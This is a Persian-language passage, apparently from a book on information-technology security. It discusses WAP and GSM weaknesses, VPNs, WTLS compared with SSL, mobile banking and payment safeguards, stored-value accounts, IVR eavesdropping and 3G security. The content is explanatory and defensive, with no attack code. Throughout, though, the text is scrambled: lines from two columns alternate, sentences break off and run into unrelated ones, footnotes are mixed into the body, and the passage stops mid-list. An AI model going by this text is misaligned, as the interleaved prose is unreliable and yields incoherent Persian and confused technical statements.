‫ﻣﻲﮔﺮﺩﺩ ﻭ ﻫﻤﻴﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﻛﻞ ﺍﺭﺗﺒﺎﻁ ﻧـﺴﺒﺖ ﺑـﻪ‬ ‫ﺗﻨﻬﺎ ﺍﺑﺰﺍﺭﻫﺎ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﻧﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ‪.‬‬
‫ﻱ ﭘﻴﺎﻡ ﺁﺳﻴﺐﭘﺬﻳﺮ ﮔﺮﺩﺩ‪.‬‬
‫ﺩﺯﺩ ﹺ‬
‫ﺿﻌﻔﻬﺎﻱ ‪WAP‬‬
‫ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ‪GSM‬‬ ‫ﻩ‪.‬‬ ‫ﻧﻘﻄﻪﺿﻌﻒ ﻣﺸﺘﺮﻙ ﺗﻤﺎﻡ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﺮﺭﺳﻲ ﺷﺪﻩ ‪ -‬ﺻـﺮﻓﻨﻈﺮ ﺍﺯ‬
‫‪١٧٠‬‬
‫ﻧﻮﻉ ﺷﺒﻜﻪ ‪ -‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﭘﺮﻭﺗﻜـﻞ ﻛـﺎﺭﺑﺮﺩ ﺑـﻲﺳـﻴﻢ )‪(WAP‬‬
‫ﻧﻘــﺎﻳﺺ ﺫﺍﺗــﻲ ‪ GSM‬ﺑﺮﺍﺣﺘــﻲ ﻗﺎﺑــﻞ ﺭﻓــﻊ ﻧﻴــﺴﺘﻨﺪ‪ .‬ﺗﻠﻔﻨﻬــﺎ ﻭ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺯﺑـﺎﻥ ﻋﻼﻣﺘﮕـﺬﺍﺭﻱ ﺑـﻲﺳـﻴﻢ )‪ ١٧١(WML‬ﻭ ﺯﺑـﺎﻥ‬
‫‪PDA‬ﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ‪ GSM‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻋﻤﻮﻣﹰﺎ ﻗﺎﺩﺭ‬
‫ﻋﻼﻣﺘﮕﺬﺍﺭﻱ ﻭﺳﺎﻳﻞ ﺩﺳﺘﻲ )‪ ١٧٢(HDML‬ﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺤﺎﻓﻆ ﻧﻤﻲﺑﺎﺷـﻨﺪ‪ .‬ﺍﮔﺮﭼـﻪ ‪GSM‬‬
‫ﺗﻮﺳﻌﻪ ﺩﻫﻨﺪﮔﺎﻥ ﺑﺮﺍﻱ ﺭﺍﺣﺖﺗﺮ ﺷﺪﻥ ﻛﺎﺭ‪ ،‬ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﺗـﻼﺵ‬
‫ﻣﺜﻞ ﻫﻤﺘﺎﻱ ﺁﻣﺮﻳﻜﺎﻳﻲ ﺧﻮﺩ ‪ -‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ - 802.11‬ﻧﺴﺒﺖ ﺑﻪ‬
‫ﻣﻲﻛﻨﻨﺪ ﻃﺮﺍﺣﻲ ﺳﻨﺎﺭﻳﻮﻫﺎ ﺑﮕﻮﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﻫﻨﮕـﺎﻡ‬
‫‪ war driving‬ﺁﺳﻴﺐﭘﺬﻳﺮ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﭼﻨﺪ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳـﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﻣﻠـﺰﻡ ﺑـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩﻥ ﻛﻮﺗـﺎﻫﺘﺮﻳﻦ‬
‫ﺩﺍﺭﺩ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ 802.11‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺖ ﻭ ﻧﻪ ﻭﺳـﺎﻳﻞ‬
‫ﻼ ﺍﻋﺪﺍﺩﻱ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﺷـﻤﺎﺭﻩ ﻛـﺎﺭﺕ‬ ‫ﻭﺭﻭﺩﻱ ﻣﻤﻜﻦ ﺑﺎﺷﺪ ‪ -‬ﻣﺜ ﹰ‬
‫ﮔﻮﺷﻲﺩﺍﺭ‪ ،‬ﻭ ﻟﺬﺍ ﺍﻣﻨﻴﺖ ﺩﺭ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻃﺮﺯ ﻣـﺆﺛﺮﻱ ﻧـﺴﺒﺖ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﻳﺎ ﺷﻤﺎﺭﺓ ﺣﺴﺎﺏ ﺷﺨﺼﻲ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺑﻪ‬
‫ﺑﻪ ‪ GSM‬ﺑﻬﺒﻮﺩ ﻳﺎﺑﺪ‪ .‬ﺷﺒﻜﻪ ﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )‪VPN‬ﻫـﺎ(‬
‫ﺁﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﻗـﺴﻤﺖ ﺍﻋﻈـﻢ ﺍﻳـﻦ ﺩﺍﺩﻩﻫـﺎ ﺩﺭﻭﻥ‬
‫ﻓﺼﻞ ﻣﺸﺘﺮﻙ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻳـﻦ ﺩﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺫﺧﻴﺮﻩ ﻣﻲﺷـﻮﻧﺪ‪ ،‬ﻭ ﺩﺭ ﻭﺳـﻴﻠﺔ ﺩﺳـﺘﻲ ﻣﺮﺑﻮﻃـﻪ‬
‫ﻻ ﺑﻌﻨــﻮﺍﻥ ﺭﺍﻩﺣﻠــﻲ ﺑــﺮﺍﻱ ﺭﻓــﻊ‬ ‫ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ‪ VPN‬ﻣﻌﻤــﻮ ﹰ‬
‫ﺗﻨﻬﺎ ﻳﻚ ‪ cookie‬ﺣﺎﻭﻱ ﺭﻣﺰ ﻋﺒـﻮﺭ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ؛ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻌﻠﻲ ‪ 802.11‬ﻭ ‪ GSM‬ﺑـﺸﻤﺎﺭ ﻣـﻲﺭﻭﺩ‪ .‬ﺑـﺎ‬
‫ﺍﻭﻗﺎﺕ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻳﻲ ﻣﺜﺎﻝ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻳـﺎ ﺍﻧﺘﻘـﺎﻝ ﺳـﺮﻣﺎﻳﻪ‬
‫ﺍﻳﻨﺤﺎﻝ ﺩﺭ ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﻻﻳﺔ ﺧﺎﺹ ﺍﻧﺘﻈـﺎﺭ‬
‫ﺻﺮﻓﹰﺎ ﺑﻪ ﻳﻚ ‪ PIN‬ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻭ ﮔﺎﻫﻲ ﺣﺘﻲ ﺍﺯ ﺁﻥ ﻫـﻢ ﺑـﻲﻧﻴـﺎﺯ‬
‫ﻣﻌﺠﺰﻩ ﺩﺍﺷﺖ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺗﺒـﺎﺩﻻﺕ ﻣﻴـﺎﻥ ﺩﺳـﺘﮕﺎﻫﻬﺎ ﺩﺭ‬
‫ﺑﻲﺳﻴﻢ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﭘﺎﻳﺎﻥ ﻫﻤﻴﻦ ﺑﺨﺶ ﻛﺘﺎﺏ ﻭ ﻧﻴﺰ ﺑﺨـﺶ‬
‫ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺮ ﻋﻬﺪﺓ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﻳﮕﺮﻱ ﺑﻪ ﻧـﺎﻡ ﺍﻣﻨﻴـﺖ ﻻﻳـﺔ‬
‫ﭘﻨﺠﻢ )ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ( ﺑﻴﺎﺑﻴﺪ‪.‬‬
‫ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳﻴﻢ )‪ ١٧٣(WTLS‬ﻣﻲﺑﺎﺷﺪ‪.‬‬

‫ﺗﺠﺎﺭﺏ ﺍﻣﻨﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ‬ ‫ﻭ‪.‬‬ ‫ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﻛﻪ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ ۱۲۸ ١٧٤SSL‬ﺑﻴﺘـﻲ ﻣﻮﺑﺎﻳـﻞ ﻳـﺎ‬
‫ﭘﺮﻭﺗﻜﻞ ‪) IPSec‬ﻛﻪ ﺑﻴﺸﺘﺮ ﮔﻮﺷﻲﻫﺎ ﺑﺪﻟﻴﻞ ﻛﻤﺒﻮﺩ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻭ ﻗﺪﺭﺕ‬
‫ﺩﺭ ﻧﺘﻴﺠﺔ ﮔﺴﺘﺮﺵ ﻓﺮﺍﻭﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ GSM‬ﺩﺭ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﭘﺮﺩﺍﺯﺵ ﺍﺯ ﺁﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﻤﻲﻛﻨﻨﺪ( ﺍﺳﺘﻔﺎﺩﻩ ﻧﺸﻮﺩ‪ ،‬ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻗﺴﻤﺘﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻛﻨﺘﺮﻟـﻲ ﻭ ﺍﻣﻨﻴﺘـﻲ ﭼﻨـﺪﻱ ﺑﻮﺟـﻮﺩ‬
‫ﺍﺯ ﺷﺒﻜﻪ ﻳﻚ ﺣﻠﻘﺔ ﺿﻌﻴﻒ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ‬
‫ﺁﻣﺪﻩﺍﻧﺪ ﻛﻪ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺩﺭﺻـﻮﺭﺕ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ‪ .‬ﺣﺘـﻲ ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﻧﻴـﺰ ﺿـﻌﻔﻬﺎﻱ‬
‫ﺑﻲﺳﻴﻢ ﺩﺭ ﺧﺪﻣﺎﺕ ﭘﺮﺩﺍﺧﺖ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺩﺍﺧﻞ ﻭﺳﻴﻠﻪ )ﻭ ﻧـﻪ ﻛﺎﻧـﺎﻝ ﺍﺭﺗﺒـﺎﻃﻲ( ﻫﻤﭽﻨـﺎﻥ ﻭﺟـﻮﺩ‬
‫ﭘﺮﺩﺍﺧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺷﺨﺺ ﺛﺎﻟﺚ‬ ‫ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؛ ﻭ ﻟﺬﺍ ﺍﻣﻨﻴﺖ ﺍﺭﺗﺒﺎﻁ ﺑﻪ ﺳـﺎﺩﮔﻲ ﺧﺪﺷـﻪﺩﺍﺭ ﻣـﻲ‪-‬‬
‫ﺷﻮﺩ‪ GSM .‬ﺍﺯ ‪ WAP‬ﻭ ‪ WTLS‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻣﻌﺎﺩﻝ‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻗﺎﻋﺪﺓ ﻛﻠﻲ‪ ،‬ﺑﺎﻧﻜﻬﺎ ﺑﺎﻳﺪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﻣﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺭﺍ‬ ‫‪ SSL‬ﺍﺳﺖ ﺍﻣﺎ ﺑﺎ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺿـﻌﻴﻔﺘﺮ‪WTLS .‬‬
‫ﺩﺭ ﻣﻌﺎﻣﻼﺕ ﻣﺎﻟﻲ ﺑﻲﺳﻴﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻨﺪ‪ .‬ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫ﺑﺎ ‪ SSL‬ﻛﻪ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺻﻨﻌﺘﻲ ﺍﺳـﺖ ﺳـﺎﺯﮔﺎﺭ ﻧﻤـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺑﻌﻀﻲ ﺍﺯ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻪ ﺑﺎﻧﻚ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺋﻤﻲ ﺑﺪﻫﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺍﺯ‬ ‫ﭘﻴﺎﻣﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭﻭﻥ ﻳﻚ ‪ gateway‬ﻣﻲﺭﻭﻧﺪ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﻭﺍﺭﺩ‬
‫ﺣﺴﺎﺏ ﺁﻧﻬﺎ ﺍﻋﺘﺒﺎﺭ ﺑﺮﺩﺍﺷﺖ ﻛﻨﺪ ﻭ ﺑﻪ ﺣـﺴﺎﺏ ﺑﺮﺧـﻲ ﺍﺷـﺨﺎﺹ‬
‫ﺛﺎﻟــﺚ ﻭﺍﺭﻳــﺰ ﻧﻤﺎﻳــﺪ‪ .‬ﭼﻨــﻴﻦ ﺗﻮﺍﻓﻘﻬــﺎﻳﻲ ﻣــﻲﺗﻮﺍﻧــﺪ ﺍﺯ ﻃﺮﻳــﻖ‬
‫ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﺣﺴﺎﺑﺮﺳﻲ ﻣـﺴﺘﻘﻴﻢ‪ ١٧٥‬ﺻـﻮﺭﺕ‬ ‫‪170‬‬
‫‪171‬‬
‫‪Wireless Application Protocol‬‬
‫‪Wireless Markup Language‬‬
‫‪172‬‬ ‫‪Handled Device Markup Language‬‬
‫‪173‬‬ ‫‪Wireless Transport Layer Security‬‬
‫‪175 Direct Debit Authorization Agreements‬‬ ‫‪174‬‬ ‫‪Secure Socket Layer‬‬
‫‪١٩٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺑﻪ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺗﻮﺻﻴﻪ ﺷﻮﺩ ﻛﻪ ﺑﺮﺍﻱ ﺧـﺪﻣﺎﺕ ﻣﺨﺘﻠـﻒ‬ ‫•‬ ‫ﺑﮕﻴﺮﺩ‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﺩﺭﺻـﻮﺭﺕ ﻋﻤـﻞ ﺑـﻪ ﺍﻳـﻦ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﻪﻫـﺎ‪،‬‬
‫ﺍﺯ ‪PIN‬ﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬ ‫ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻣﺸﺘﺮﻳﺎﻥ )‪ID‬ﻫـﺎ‬
‫ﻭ ‪PIN‬ﻫﺎ( ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻳﺎ ﺁﻧﻬﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﭘﺮﺩﺍﺧـﺖ‬ ‫•‬
‫ﺳﻴﺎﺭ ﺑﺎﻳﺪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﺫﺧﻴﺮﻩ‬
‫ﺳﻴﺎﺭ ﺑﻪ ﻣﺸﺘﺮﻱ ﺩﺍﺩﻩ ﺷﻮﺩ‪.‬‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﺫﺧﻴﺮﻩ )‪ ١٧٦(SVA‬ﺗﻮﺳﻂ ﻣﺸﺘﺮﻳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷـﻮﺩ‬
‫ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺩﺭ ﻣﻮﺭﺩ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻣﺸﺎﺟﺮﺍﺕ‪ ،‬ﺭﻭﺍﻟﻬـﺎﻱ‬ ‫•‬
‫ﻛﻪ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩ ﺍﻱ ﺑﻪ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎ ﭘﻮﻝ ﻭﺍﺭﻳﺰ ﻣﻲﻛﻨﻨﺪ‪SVA .‬‬
‫ﮔﺰﺍﺭﺵﺩﻫﻲ ﻭ ﺯﻣﺎﻥ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺭﻓﻊ ﻭ ﺭﺟﻮﻉ ﺷـﻜﺎﻳﺎﺕ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺳـﻴﺎﺭ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ‪ .‬ﻫﻨﮕـﺎﻡ ﺍﻧﺠـﺎﻡ‬
‫ﺑﺎﻳﺪ ﺑﻪ ﻣﺸﺘﺮﻱ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ‪.‬‬
‫ﻋﻤﻠﻴﺎﺕ ﭘﺮﺩﺍﺧﺖ‪ ،‬ﻫﻴﭻ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻧﺒﺎﻳﺪ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ‬
‫ﻧﮕﺎﻩ ﺑﻪ ﺁﻳﻨﺪﻩ‪ :‬ﻓﻨﺎﻭﺭﻱ ﻧﺴﻞ ﺳﻮﻡ‬ ‫ﮔﻴﺮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻋﺘﺒﺎﺭ ﺍﺯ ﻳﻚ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑﻪ ﻳﻚ ﺣـﺴﺎﺏ‬
‫‪ SVA‬ﺣﺘﻤﹰﺎ ﺻﺎﺣﺐ ﺁﻥ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﺑﺎﻳﺪ ﺷﺨـﺼﹰﺎ ﺑـﻪ ﺍﻳﻨﻜـﺎﺭ‬
‫ﻧﺴﻞ ﺳﻮﻡ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺑﻪ ﺍﺧﺘﺼﺎﺭ ‪ 3G‬ﺧﻮﺍﻧﺪﻩ ﻣـﻲﺷـﻮﺩ ﻭ‬ ‫ﺍﻗﺪﺍﻡ ﻛﻨﺪ‪.‬‬
‫ﺑﻪ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲ ﺳـﻴﻢ ﺩﺭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ‪ .‬ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﺍﻳﻦ ﻃﺮﺡ ﺑـﺎﻻﺑﺮﺩﻥ ﺳـﺮﻋﺖ ﺍﻧﺘﻘـﺎﻝ ﺍﺯ‬ ‫ﭘﺮﺩﺍﺧﺘﻬﺎﻱ ﻧﺰﺩﻳﻚ ﺑﻲﺳﻴﻢ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫‪ ۹،۵‬ﻛﻴﻠﻮﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴﻪ ﺑﻪ ‪ ۲‬ﻣﮕﺎﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴـﻪ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺯﻣﻴﻨـﺔ‬


‫ﺧــﺪﻣﺎﺕ ﭘﺮﺩﺍﺧــﺖ ﻧﺰﺩﻳــﻚ ﺑــﻲﺳــﻴﻢ‪ ١٧٧‬ﻣﻌﻤــﻮ ﹰ‬
‫ﻻ ﺑــﺮﺍﻱ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﻫﺪﻑ ﺍﺻﻠﻲ ﻃﺮﺍﺣﻲ ﻳﻚ ﺳﻴﺴﺘﻢ‬
‫ﺧﺮﺩﻩﻓﺮﻭﺷﻴﻬﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺗﻌﺪﺍﺩ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ‪ .‬ﺍﻳـﻦ ﺗﺮﺍﻛﻨـﺸﻬﺎ‬
‫ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻲ ﺍﺳﺖ ﻛﻪ ﺍﮔـﺮ ﻧﻴـﺎﺯ‬
‫ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺯﻣﺎﻧﻲ ﻛﺎﻣـﻞ ﺷـﻮﻧﺪ ﻛـﻪ ﻣـﺸﺘﺮﻱ ﺩﺭ ﻧﻘﻄـﺔ ﻓـﺮﻭﺵ‬
‫ﺑﻪ ﺁﻥ ﺍﺣﺴﺎﺱ ﺷﺪ ﺑﺘﻮﺍﻧﺪ ﺑﺎ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺎﺯﮔﺎﺭﻱ ﭘﻴـﺪﺍ‬
‫ﺻﺮﺍﺣﺘﹰﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﭼﻨﻴﻦ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺘﻲ ﺻﻮﺭﺕ‬
‫ﻛﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺗﻲ ﻛﻪ ﻭﻗﻮﻉ ﺁﻧﻬـﺎ ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﻧـﺴﻞ‬
‫ﻧﮕﺮﻓﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ‬
‫ﺩﻭﻡ ﻭ ﺣﺘﻲ ﻛﻤﻲ ﭘﻴﺸﺮﻓﺘﻪﺗﺮ ﺍﺯ ﺁﻥ ﻣﻤﻜﻦ ﺑـﻮﺩ‪ ،‬ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ‬
‫ﻣﺸﺘﺮﻱ ﺍﺯ ﻃﺮﻳﻖ ‪ SVA‬ﻣﺮﺑﻮﻃﻪ ﺑﻄﻮﺭ ﻏﻴﺮﺍﺭﺍﺩﻱ ﺩﭼﺎﺭ ﻛـﺴﺮﻱ‬
‫ﻧﺴﻞ ﺳﻮﻡ ﺑﻜﻠﻲ ﺣﺬﻑ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﮔﺮﺩﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﻉ ﺩﺭﺧﻮﺍﺳﺖ ﭘﺮﺩﺍﺧﺖ ﻭﺟﻪ‪ ،‬ﺗـﺼﺪﻳﻖ‬
‫ﺍﺳﺘﺤﻜﺎﻡ ﺳﺎﺧﺘﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻧﺴﻞ ﺳﻮﻡ‬ ‫ﻫﻮﻳﺖ ﺻﺮﻳﺢ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺍﺟﺒﺎﺭﻱ ﺑﺎﺷﺪ‪.‬‬

‫ﺍﻣﻨﻴﺖ ﻧﺴﻞ ﺳﻮﻡ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻣﻨﻴﺖ ‪ GSM‬ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳـﺖ‪،‬‬ ‫ﭘﺎﺳﺦ ﺗﻌﺎﻣﻠﻲ ﺻﻮﺗﻲ‬
‫ﺍﻣﺎ ﺑﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺯﻳﺮ‪:‬‬
‫ﺧﺪﻣﺎﺕ ﭘﺎﺳﺦ ﺗﻌﺎﻣﻠﻲ ﺻﻮﺗﻲ ﺳﻴﺎﺭ )‪ ١٧٨(Mobile IVR‬ﻧﺴﺒﺖ ﺑـﻪ‬
‫ﻳﻜﻲ ﺍﺯ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺮﺍﻱ ﻏﻠﺒـﻪ ﺑـﺮ ﺣﻤﻠـﻪ ﺍﻱ ﻣﻮﺳـﻮﻡ ﺑـﻪ‬ ‫•‬ ‫ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺁﺳﻴﺐ ﭘـﺬﻳﺮ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ IVR‬ﻧﺒﺎﻳـﺪ‬
